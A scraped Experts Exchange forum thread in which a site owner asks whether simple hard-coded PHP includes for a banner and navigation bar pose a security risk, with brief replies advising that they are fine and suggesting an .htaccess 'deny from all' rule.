scotthorton
asked on
is this PHP include a security risk?
I have some code that is mostly static, but changes once every few months. It is related to the display of a set of logos on my webpage, and navigation bar item changes. Instead of having to go and update every single webpage that includes these same items each time the list of logo images changes, or I need a new navigation bar item, I needed to be able to globally edit them.
I chose to do this using PHP includes such as:
<?php include("includes/bannerli
<?php include("includes/navbar.h
This seems ot be a good solution and is working.
All references to include files are hard coded as shown above, and all related files are stored locally on the same webserver/site.
I have read about security issues related to PHP includes but they seemed to be related to more complex things than what I am doing.
My question is, are the includes I have, like show above, any type of security risk? And if they are, what is the best way to mitigate the risk?
I chose to do this using PHP includes such as:
<?php include("includes/bannerli
<?php include("includes/navbar.h
This seems ot be a good solution and is working.
All references to include files are hard coded as shown above, and all related files are stored locally on the same webserver/site.
I have read about security issues related to PHP includes but they seemed to be related to more complex things than what I am doing.
My question is, are the includes I have, like show above, any type of security risk? And if they are, what is the best way to mitigate the risk?
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Not "a huge blunder" - quite the opposite. You're doing it the right way. And if it's working right for you I would not change the file types or mess with the locations or the permissions. Sure, it's possible for somebody to look into those URL paths and see the HTML you have in the include files, but what harm is that? They can see it with "view source" on your web pages!
ASKER
Ray:
Thanks. Is thee a real life story behind that explanation <big grin>.
FWIW, I am the only one with root access, including the host. And my handful of users are not allowed any shell access. It's a low end renetd dedicated server but of course the provider could get into it with console access. I don't think the PO'd wife can though <grin>. Well unless she's the IT brain in the fam...
Thanks. Is thee a real life story behind that explanation <big grin>.
FWIW, I am the only one with root access, including the host. And my handful of users are not allowed any shell access. It's a low end renetd dedicated server but of course the provider could get into it with console access. I don't think the PO'd wife can though <grin>. Well unless she's the IT brain in the fam...
Happily, no! But it makes the useful illustration. What do we want to protect and what do we want to guard against? If it's nuclear codes, the situation is somewhat different when compared to money, or medical records, or fishing statistics.
Best to all, ~Ray
Best to all, ~Ray
In the .htaccess file Include the line
"deny from all"
if you are worried about it.
"deny from all"
if you are worried about it.
ASKER
Almost conflicting replies though.
I will not be passing any get variables in the includes.
I can change the include files to .php.
MunderMan, can you tell me what permissions should I set in .htaccess for the includes?
I'll check out the security link. May be over my head, but I'll see. I just wanted to make sure I wasn't making a huge blunder by using these includes to simplify my site file management.
Thanks guys,
Scott